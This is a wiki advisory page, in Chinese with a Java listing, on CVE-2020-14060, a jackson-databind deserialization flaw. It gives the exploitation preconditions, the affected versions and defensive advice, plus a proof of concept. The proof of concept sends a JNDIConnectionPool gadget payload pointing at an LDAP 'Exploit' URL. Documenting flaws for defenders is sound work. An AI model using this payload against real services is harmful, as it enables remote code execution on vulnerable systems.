Difference between revisions of "CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞"

(Created page with "<languages /> <translate> ==利用條件== </translate> <translate> 開啟enableDefaultTyping() 使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 </translate> <tr...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==利用條件==
+
==利用條件== <!--T:1-->
 
</translate>
 
</translate>
 
<translate>
 
<translate>
 +
<!--T:2-->
 
開啟enableDefaultTyping()
 
開啟enableDefaultTyping()
  
 +
<!--T:3-->
 
使用了org.apache.drill.exec:drill-jdbc-all第三方依賴
 
使用了org.apache.drill.exec:drill-jdbc-all第三方依賴
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:4-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 09:03, 17 June 2021


利用條件

ObjectMapper 已呼叫 enableDefaultTyping()(開啟預設型別處理)

專案使用了第三方依賴 org.apache.drill.exec:drill-jdbc-all

影響版本

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

POC

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

/**
 * Minimal reproduction of the unsafe polymorphic deserialization described on this page
 * (CVE-2020-14060).
 *
 * <p>Both preconditions listed on the page are visible in the code: default typing is switched on
 * for the mapper, and the JSON names a class under the {@code oadd.} prefix.
 * NOTE(review): {@code oadd.} is presumably the shaded package inside drill-jdbc-all; confirm
 * against the artifact.
 *
 * <p>Defensive takeaways for code that reads untrusted JSON:
 * <ul>
 *   <li>Do not call {@code enableDefaultTyping()} on such mappers. On Jackson 2.10+ prefer
 *       {@code activateDefaultTyping(...)} with an allow-list {@code PolymorphicTypeValidator}.</li>
 *   <li>Upgrade jackson-databind past the affected ranges listed on this page.</li>
 *   <li>Audit for {@code enableDefaultTyping()} and class-name based {@code @JsonTypeInfo}, and
 *       alert on unexpected outbound LDAP/RMI connections from application JVMs.</li>
 * </ul>
 */
public class Poc {
   /**
    * Deserializes a type-tagged JSON document with default typing enabled, then serializes the
    * resulting object again.
    *
    * @param args unused
    * @throws Exception declared by the original listing; only {@link IOException} is handled here
    */
   public static void main(String[] args) throws Exception {
       // Two-element array form: element 0 is the class name the mapper is asked to instantiate,
       // element 1 holds its properties. The JNDI target is loopback, so this only resolves
       // against a listener on the test machine itself.
       final String json = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";

       final ObjectMapper typedMapper = new ObjectMapper();
       // Precondition from the page: with default typing on, the class name comes from the input
       // rather than from the declared target type (Object.class below).
       typedMapper.enableDefaultTyping();

       try {
           final Object materialized = typedMapper.readValue(json, Object.class);
           // NOTE(review): the page does not explain why the object is serialized again;
           // presumably property access during serialization is what reaches the JNDI lookup.
           // Confirm before relying on this.
           typedMapper.writeValueAsString(materialized);
       } catch (IOException ioFailure) {
           ioFailure.printStackTrace();
       }
   }
}